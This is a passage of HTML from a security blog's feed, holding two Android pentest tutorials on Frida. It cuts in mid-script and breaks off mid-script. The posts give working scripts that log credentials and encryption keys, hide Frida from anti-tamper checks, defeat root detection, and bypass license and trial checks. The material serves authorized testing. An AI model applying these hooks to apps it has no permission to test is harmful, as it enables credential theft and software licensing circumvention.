class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="nf">toInt32</span><span class="p">();</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[+] AES_set_encrypt_key called</span><span class="dl">"</span><span class="p">);</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2"> Key length: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">keyLen</span> <span class="o">+</span> <span class="dl">"</span><span class="s2"> bits</span><span class="dl">"</span><span class="p">);</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2"> Key: </span><span class="dl">"</span> <span class="o">+</span> <span class="nf">hexdump</span><span class="p">(</span><span class="nx">args</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="p">{</span> <span class="na">length</span><span class="p">:</span> <span class="nx">keyLen</span> <span class="o">/</span> <span class="mi">8</span> <span class="p">}));</span> <span class="p">}</span> <span class="p">});</span> <span class="p">}</span> </code></pre></div></div> <p>For custom crypto you’ll need to reverse engineer the library first to find the right functions, but the hooking part is the same.</p> <h2 id="tracing-function-calls">Tracing Function Calls</h2> <p>Sometimes you want to see the call flow through native code. Frida’s Stalker API can trace every instruction but it’s heavy. For a lighter approach, hook multiple functions:</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">funcsToTrace</span> <span class="o">=</span> <span class="p">[</span> <span class="dl">"</span><span class="s2">decrypt</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">verify</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">processData</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">sendRequest</span><span class="dl">"</span> <span class="p">];</span> <span class="nx">funcsToTrace</span><span class="p">.</span><span class="nf">forEach</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">name</span><span class="p">)</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">addr</span> <span class="o">=</span> <span class="nx">module</span><span class="p">.</span><span class="nf">getExportByName</span><span class="p">(</span><span class="nx">name</span><span class="p">);</span> <span class="k">if </span><span class="p">(</span><span class="nx">addr</span><span class="p">)</span> <span class="p">{</span> <span class="nx">Interceptor</span><span class="p">.</span><span class="nf">attach</span><span class="p">(</span><span class="nx">addr</span><span class="p">,</span> <span class="p">{</span> <span class="na">onEnter</span><span class="p">:</span> <span class="kd">function</span><span class="p">(</span><span class="nx">args</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[TRACE] </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">name</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">() called</span><span class="dl">"</span><span class="p">);</span> <span class="p">}</span> <span class="p">});</span> <span class="p">}</span> <span class="p">});</span> </code></pre></div></div> <p>This gives you a high-level view of what’s happening without the overhead of full tracing.</p> <h2 id="bypassing-anti-frida-checks">Bypassing Anti-Frida Checks</h2> <p>Some apps try to detect Frida by looking for:</p> <ul> <li>Frida’s default port (27042)</li> <li>Frida libraries in memory</li> <li>Frida’s named pipes</li> <li>Specific strings in /proc/maps</li> </ul> <p>You can hook the detection functions once you find them:</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Hook strstr to hide frida strings</span> <span class="kd">var</span> <span class="nx">strstr</span> <span class="o">=</span> <span class="nx">Module</span><span class="p">.</span><span class="nf">findExportByName</span><span class="p">(</span><span class="kc">null</span><span class="p">,</span> <span class="dl">"</span><span class="s2">strstr</span><span class="dl">"</span><span class="p">);</span> <span class="nx">Interceptor</span><span class="p">.</span><span class="nf">attach</span><span class="p">(</span><span class="nx">strstr</span><span class="p">,</span> <span class="p">{</span> <span class="na">onEnter</span><span class="p">:</span> <span class="kd">function</span><span class="p">(</span><span class="nx">args</span><span class="p">)</span> <span class="p">{</span> <span class="k">this</span><span class="p">.</span><span class="nx">haystack</span> <span class="o">=</span> <span class="nx">args</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="nf">readCString</span><span class="p">();</span> <span class="k">this</span><span class="p">.</span><span class="nx">needle</span> <span class="o">=</span> <span class="nx">args</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="nf">readCString</span><span class="p">();</span> <span class="p">},</span> <span class="na">onLeave</span><span class="p">:</span> <span class="kd">function</span><span class="p">(</span><span class="nx">retval</span><span class="p">)</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="k">this</span><span class="p">.</span><span class="nx">needle</span><span class="p">.</span><span class="nf">includes</span><span class="p">(</span><span class="dl">"</span><span class="s2">frida</span><span class="dl">"</span><span class="p">)</span> <span class="o">||</span> <span class="k">this</span><span class="p">.</span><span class="nx">needle</span><span class="p">.</span><span class="nf">includes</span><span class="p">(</span><span class="dl">"</span><span class="s2">xposed</span><span class="dl">"</span><span class="p">))</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[+] Hiding: </span><span class="dl">"</span> <span class="o">+</span> <span class="k">this</span><span class="p">.</span><span class="nx">needle</span><span class="p">);</span> <span class="nx">retval</span><span class="p">.</span><span class="nf">replace</span><span class="p">(</span><span class="nf">ptr</span><span class="p">(</span><span class="mi">0</span><span class="p">));</span> <span class="c1">// Return NULL (not found)</span> <span class="p">}</span> <span class="p">}</span> <span class="p">});</span> </code></pre></div></div> <p>You can also hook <code class="language-plaintext highlighter-rouge">fopen</code> to hide <code class="language-plaintext highlighter-rouge">/proc/self/maps</code> or return fake contents. It’s a cat and mouse game but usually you can win.</p> <h2 id="a-recon-script-for-native-analysis">A Recon Script for Native Analysis</h2> <p>Here’s a script I use when starting native analysis on a new app:</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// native-recon.js</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[*] Native Recon Starting...</span><span class="se">\n</span><span class="dl">"</span><span class="p">);</span> <span class="c1">// List app's native libraries</span> <span class="nx">Process</span><span class="p">.</span><span class="nf">enumerateModules</span><span class="p">({</span> <span class="na">onMatch</span><span class="p">:</span> <span class="kd">function</span><span class="p">(</span><span class="nx">m</span><span class="p">)</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">m</span><span class="p">.</span><span class="nx">path</span><span class="p">.</span><span class="nf">includes</span><span class="p">(</span><span class="dl">"</span><span class="s2">/data/</span><span class="dl">"</span><span class="p">))</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[LIB] </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">m</span><span class="p">.</span><span class="nx">name</span><span class="p">);</span> <span class="c1">// List exports for each</span> <span class="nx">m</span><span class="p">.</span><span class="nf">enumerateExports</span><span class="p">().</span><span class="nf">forEach</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">e</span><span class="p">.</span><span class="nx">type</span> <span class="o">===</span> <span class="dl">"</span><span class="s2">function</span><span class="dl">"</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2"> -&gt; </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">e</span><span class="p">.</span><span class="nx">name</span><span class="p">);</span> <span class="p">}</span> <span class="p">});</span> <span class="p">}</span> <span class="p">},</span> <span class="na">onComplete</span><span class="p">:</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="se">\n</span><span class="s2">[*] Library enumeration complete</span><span class="se">\n</span><span class="dl">"</span><span class="p">);</span> <span class="p">}</span> <span class="p">});</span> <span class="c1">// Hook common crypto functions</span> <span class="kd">var</span> <span class="nx">cryptoHooks</span> <span class="o">=</span> <span class="p">{</span> <span class="dl">"</span><span class="s2">libcrypto.so</span><span class="dl">"</span><span class="p">:</span> <span class="p">[</span><span class="dl">"</span><span class="s2">AES_encrypt</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">AES_decrypt</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">EVP_EncryptUpdate</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">EVP_DecryptUpdate</span><span class="dl">"</span><span class="p">],</span> <span class="dl">"</span><span class="s2">libc.so</span><span class="dl">"</span><span class="p">:</span> <span class="p">[</span><span class="dl">"</span><span class="s2">open</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">read</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">write</span><span class="dl">"</span><span class="p">]</span> <span class="p">};</span> <span class="nb">Object</span><span class="p">.</span><span class="nf">keys</span><span class="p">(</span><span class="nx">cryptoHooks</span><span class="p">).</span><span class="nf">forEach</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">lib</span><span class="p">)</span> <span class="p">{</span> <span class="nx">cryptoHooks</span><span class="p">[</span><span class="nx">lib</span><span class="p">].</span><span class="nf">forEach</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">func</span><span class="p">)</span> <span class="p">{</span> <span class="k">try</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">addr</span> <span class="o">=</span> <span class="nx">Module</span><span class="p">.</span><span class="nf">findExportByName</span><span class="p">(</span><span class="nx">lib</span><span class="p">,</span> <span class="nx">func</span><span class="p">);</span> <span class="k">if </span><span class="p">(</span><span class="nx">addr</span><span class="p">)</span> <span class="p">{</span> <span class="nx">Interceptor</span><span class="p">.</span><span class="nf">attach</span><span class="p">(</span><span class="nx">addr</span><span class="p">,</span> <span class="p">{</span> <span class="na">onEnter</span><span class="p">:</span> <span class="kd">function</span><span class="p">(</span><span class="nx">args</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[HOOK] </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">lib</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">!</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">func</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">()</span><span class="dl">"</span><span class="p">);</span> <span class="p">}</span> <span class="p">});</span> <span class="p">}</span> <span class="p">}</span> <span class="k">catch</span><span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{}</span> <span class="p">});</span> <span class="p">});</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[*] Hooks installed. Use the app...</span><span class="se">\n</span><span class="dl">"</span><span class="p">);</span> </code></pre></div></div> <h2 id="tips-for-native-hooking">Tips for Native Hooking</h2> <p>A few things that have helped me:</p> <ul> <li><strong>Match architectures</strong> — ARM offsets are different from ARM64. Check what your target device uses.</li> <li><strong>Watch for ASLR</strong> — Always calculate addresses relative to the module base, never use hardcoded addresses.</li> <li><strong>Handle crashes gracefully</strong> — Native hooks can crash the app if you mess up. Save your work and use try/catch.</li> <li><strong>Combine with Java hooks</strong> — Often the interesting flow goes Java → Native → Java. Hook both sides.</li> <li><strong>Use hexdump()</strong> — Frida’s built-in hexdump is great for viewing binary data.</li> </ul> <h2 id="whats-next">What’s Next</h2> <p>With native hooking you can get into parts of apps that developers thought were protected. I’ve found hardcoded keys, bypassed integrity checks, and reverse engineered proprietary protocols using these techniques.</p> <p>In a future post I’ll cover automating app analysis with Frida scripts and objection. Building reusable tools saves a ton of time on engagements.</p> <p>More to come!</p> Tue, 25 Nov 2025 20:00:00 +0000 https://www.marginaldeer.com//blog/frida-native-hooking/ https://www.marginaldeer.com//blog/frida-native-hooking/ android frida reverse-engineering native pentest blog Frida Method Hooking for Android App Analysis <p>This is part three of my Android pentest series. We’ve covered <a href="/blog/android-pentest-lab/">setting up the lab</a> and <a href="/blog/android-ssl-pinning-bypass/">bypassing SSL pinning</a>. Now let’s go deeper with Frida and start hooking methods, tracing function calls, and pulling secrets out of running apps.</p> <p>I’ve relied on Frida heavily on recent engagements and it’s become one of my favorite tools. It lets you inject JavaScript into running processes which means we can:</p> <ul> <li>Intercept method calls and log arguments</li> <li>Modify arguments before they reach the original method</li> <li>Steal return values (encryption keys, tokens, etc.)</li> <li>Change return values to bypass security controls</li> <li>Trace execution flow through the app</li> </ul> <p>All at runtime without touching the APK.</p> <h2 id="getting-started">Getting Started</h2> <p>Make sure you have Frida installed (<code class="language-plaintext highlighter-rouge">pip install frida-tools</code>) and the Frida server running on your emulator or rooted device. I covered the setup in my <a href="/blog/android-ssl-pinning-bypass/">SSL pinning post</a> so check that out if you haven’t already.</p> <p>Verify everything is working:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>frida-ps <span class="nt">-U</span> </code></pre></div></div> <p>You should see a list of processes on the device.</p> <h2 id="finding-what-to-hook">Finding What to Hook</h2> <p>Before we can hook anything we need to know what’s in the app. I usually start by listing all the loaded classes and filtering for the app’s package name.</p> <p>Save this as <code class="language-plaintext highlighter-rouge">list-classes.js</code>:</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Java</span><span class="p">.</span><span class="nf">perform</span><span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">enumerateLoadedClasses</span><span class="p">({</span> <span class="na">onMatch</span><span class="p">:</span> <span class="kd">function</span><span class="p">(</span><span class="nx">className</span><span class="p">)</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">className</span><span class="p">.</span><span class="nf">includes</span><span class="p">(</span><span class="dl">"</span><span class="s2">com.target</span><span class="dl">"</span><span class="p">))</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="nx">className</span><span class="p">);</span> <span class="p">}</span> <span class="p">},</span> <span class="na">onComplete</span><span class="p">:</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[*] Class enumeration complete</span><span class="dl">"</span><span class="p">);</span> <span class="p">}</span> <span class="p">});</span> <span class="p">});</span> </code></pre></div></div> <p>Run it with:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>frida <span class="nt">-U</span> <span class="nt">-f</span> com.target.app <span class="nt">-l</span> list-classes.js <span class="nt">--no-pause</span> </code></pre></div></div> <p>Once you find an interesting class you can list all its methods:</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Java</span><span class="p">.</span><span class="nf">perform</span><span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">targetClass</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">com.target.app.crypto.AESHelper</span><span class="dl">"</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">methods</span> <span class="o">=</span> <span class="nx">targetClass</span><span class="p">.</span><span class="kd">class</span><span class="p">.</span><span class="nf">getDeclaredMethods</span><span class="p">();</span> <span class="nx">methods</span><span class="p">.</span><span class="nf">forEach</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">method</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="nx">method</span><span class="p">.</span><span class="nf">toString</span><span class="p">());</span> <span class="p">});</span> <span class="p">});</span> </code></pre></div></div> <p>This gives you a roadmap of what the app is doing under the hood.</p> <h2 id="basic-method-hooking">Basic Method Hooking</h2> <p>Let’s say we found a login method and want to see what credentials are being passed. Here’s how to hook it and log the arguments:</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Java</span><span class="p">.</span><span class="nf">perform</span><span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">LoginActivity</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">com.target.app.LoginActivity</span><span class="dl">"</span><span class="p">);</span> <span class="nx">LoginActivity</span><span class="p">.</span><span class="nx">authenticate</span><span class="p">.</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">username</span><span class="p">,</span> <span class="nx">password</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[+] authenticate() called</span><span class="dl">"</span><span class="p">);</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2"> Username: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">username</span><span class="p">);</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2"> Password: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">password</span><span class="p">);</span> <span class="k">return</span> <span class="k">this</span><span class="p">.</span><span class="nf">authenticate</span><span class="p">(</span><span class="nx">username</span><span class="p">,</span> <span class="nx">password</span><span class="p">);</span> <span class="p">};</span> <span class="p">});</span> </code></pre></div></div> <p>This intercepts the method, logs whatever gets passed to it, then lets the original method run. Simple but incredibly useful.</p> <h2 id="dealing-with-overloaded-methods">Dealing with Overloaded Methods</h2> <p>Java methods can have the same name but different parameters. If you try to hook one and get an error about ambiguous overloads, you need to specify which version you want:</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Java</span><span class="p">.</span><span class="nf">perform</span><span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">Crypto</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">com.target.app.utils.Crypto</span><span class="dl">"</span><span class="p">);</span> <span class="nx">Crypto</span><span class="p">.</span><span class="nx">encrypt</span><span class="p">.</span><span class="nf">overload</span><span class="p">(</span><span class="dl">'</span><span class="s1">java.lang.String</span><span class="dl">'</span><span class="p">).</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">data</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[+] encrypt(String) called with: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">data</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">result</span> <span class="o">=</span> <span class="k">this</span><span class="p">.</span><span class="nf">encrypt</span><span class="p">(</span><span class="nx">data</span><span class="p">);</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[+] Returns: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">result</span><span class="p">);</span> <span class="k">return</span> <span class="nx">result</span><span class="p">;</span> <span class="p">};</span> <span class="nx">Crypto</span><span class="p">.</span><span class="nx">encrypt</span><span class="p">.</span><span class="nf">overload</span><span class="p">(</span><span class="dl">'</span><span class="s1">[B</span><span class="dl">'</span><span class="p">).</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">data</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[+] encrypt(byte[]) called</span><span class="dl">"</span><span class="p">);</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[+] Data: </span><span class="dl">"</span> <span class="o">+</span> <span class="nf">bytesToHex</span><span class="p">(</span><span class="nx">data</span><span class="p">));</span> <span class="k">return</span> <span class="k">this</span><span class="p">.</span><span class="nf">encrypt</span><span class="p">(</span><span class="nx">data</span><span class="p">);</span> <span class="p">};</span> <span class="p">});</span> <span class="kd">function</span> <span class="nf">bytesToHex</span><span class="p">(</span><span class="nx">bytes</span><span class="p">)</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">hex</span> <span class="o">=</span> <span class="p">[];</span> <span class="k">for </span><span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&lt;</span> <span class="nx">bytes</span><span class="p">.</span><span class="nx">length</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> <span class="nx">hex</span><span class="p">.</span><span class="nf">push</span><span class="p">((</span><span class="dl">'</span><span class="s1">0</span><span class="dl">'</span> <span class="o">+</span> <span class="p">(</span><span class="nx">bytes</span><span class="p">[</span><span class="nx">i</span><span class="p">]</span> <span class="o">&amp;</span> <span class="mh">0xFF</span><span class="p">).</span><span class="nf">toString</span><span class="p">(</span><span class="mi">16</span><span class="p">)).</span><span class="nf">slice</span><span class="p">(</span><span class="o">-</span><span class="mi">2</span><span class="p">));</span> <span class="p">}</span> <span class="k">return</span> <span class="nx">hex</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="dl">''</span><span class="p">);</span> <span class="p">}</span> </code></pre></div></div> <p>The <code class="language-plaintext highlighter-rouge">[B</code> notation means byte array. It’s weird Java internal syntax but you get used to it.</p> <h2 id="stealing-encryption-keys">Stealing Encryption Keys</h2> <p>This is where things get fun. A lot of apps use hardcoded keys or generate them at runtime. Either way we can grab them by hooking the crypto classes.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Java</span><span class="p">.</span><span class="nf">perform</span><span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">SecretKeySpec</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">javax.crypto.spec.SecretKeySpec</span><span class="dl">"</span><span class="p">);</span> <span class="nx">SecretKeySpec</span><span class="p">.</span><span class="nx">$init</span><span class="p">.</span><span class="nf">overload</span><span class="p">(</span><span class="dl">'</span><span class="s1">[B</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">java.lang.String</span><span class="dl">'</span><span class="p">).</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">key</span><span class="p">,</span> <span class="nx">algorithm</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[+] SecretKeySpec created</span><span class="dl">"</span><span class="p">);</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2"> Algorithm: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">algorithm</span><span class="p">);</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2"> Key (hex): </span><span class="dl">"</span> <span class="o">+</span> <span class="nf">bytesToHex</span><span class="p">(</span><span class="nx">key</span><span class="p">));</span> <span class="k">return</span> <span class="k">this</span><span class="p">.</span><span class="nf">$init</span><span class="p">(</span><span class="nx">key</span><span class="p">,</span> <span class="nx">algorithm</span><span class="p">);</span> <span class="p">};</span> <span class="p">});</span> </code></pre></div></div> <p>I’ve pulled AES keys, API secrets, and all sorts of goodies with this technique. You can also hook <code class="language-plaintext highlighter-rouge">Cipher.doFinal()</code> to see the actual encryption and decryption happening in real time.</p> <h2 id="bypassing-root-detection">Bypassing Root Detection</h2> <p>A lot of apps refuse to run on rooted devices. Rather than mess with hiding root, I just hook the detection methods and make them return false:</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Java</span><span class="p">.</span><span class="nf">perform</span><span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">RootBeer</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">com.scottyab.rootbeer.RootBeer</span><span class="dl">"</span><span class="p">);</span> <span class="nx">RootBeer</span><span class="p">.</span><span class="nx">isRooted</span><span class="p">.</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[+] isRooted() called, returning false</span><span class="dl">"</span><span class="p">);</span> <span class="k">return</span> <span class="kc">false</span><span class="p">;</span> <span class="p">};</span> <span class="kd">var</span> <span class="nx">File</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">java.io.File</span><span class="dl">"</span><span class="p">);</span> <span class="nx">File</span><span class="p">.</span><span class="nx">exists</span><span class="p">.</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">path</span> <span class="o">=</span> <span class="k">this</span><span class="p">.</span><span class="nf">getAbsolutePath</span><span class="p">();</span> <span class="k">if </span><span class="p">(</span><span class="nx">path</span><span class="p">.</span><span class="nf">indexOf</span><span class="p">(</span><span class="dl">"</span><span class="s2">su</span><span class="dl">"</span><span class="p">)</span> <span class="o">!==</span> <span class="o">-</span><span class="mi">1</span> <span class="o">||</span> <span class="nx">path</span><span class="p">.</span><span class="nf">indexOf</span><span class="p">(</span><span class="dl">"</span><span class="s2">magisk</span><span class="dl">"</span><span class="p">)</span> <span class="o">!==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[+] Hiding root path: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">path</span><span class="p">);</span> <span class="k">return</span> <span class="kc">false</span><span class="p">;</span> <span class="p">}</span> <span class="k">return</span> <span class="k">this</span><span class="p">.</span><span class="nf">exists</span><span class="p">();</span> <span class="p">};</span> <span class="p">});</span> </code></pre></div></div> <p>RootBeer is a common detection library so this covers a lot of apps. For custom detection you’ll need to reverse engineer the app to find their specific checks.</p> <h2 id="changing-return-values">Changing Return Values</h2> <p>Need to bypass a license check or make the app think you’re a premium user? Just change what the method returns:</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Java</span><span class="p">.</span><span class="nf">perform</span><span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">LicenseCheck</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">com.target.app.LicenseValidator</span><span class="dl">"</span><span class="p">);</span> <span class="nx">LicenseCheck</span><span class="p">.</span><span class="nx">isLicensed</span><span class="p">.</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[+] isLicensed() bypassed!</span><span class="dl">"</span><span class="p">);</span> <span class="k">return</span> <span class="kc">true</span><span class="p">;</span> <span class="p">};</span> <span class="nx">LicenseCheck</span><span class="p">.</span><span class="nx">getDaysRemaining</span><span class="p">.</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[+] getDaysRemaining() spoofed!</span><span class="dl">"</span><span class="p">);</span> <span class="k">return</span> <span class="mi">9999</span><span class="p">;</span> <span class="p">};</span> <span class="p">});</span> </code></pre></div></div> <p>I’ve used this on engagements to bypass trial restrictions and test what functionality is available in the full version.</p> <h2 id="dumping-sharedpreferences">Dumping SharedPreferences</h2> <p>Apps love to store things in SharedPreferences, sometimes including things they shouldn’t. Hook it and see everything the app reads:</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Java</span><span class="p">.</span><span class="nf">perform</span><span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">SharedPreferences</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">android.app.SharedPreferencesImpl</span><span class="dl">"</span><span class="p">);</span> <span class="nx">SharedPreferences</span><span class="p">.</span><span class="nx">getString</span><span class="p">.</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">key</span><span class="p">,</span> <span class="nx">defValue</span><span class="p">)</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">value</span> <span class="o">=</span> <span class="k">this</span><span class="p">.</span><span class="nf">getString</span><span class="p">(</span><span class="nx">key</span><span class="p">,</span> <span class="nx">defValue</span><span class="p">);</span> <span class="nx">console</span><span class="p">.</span><span 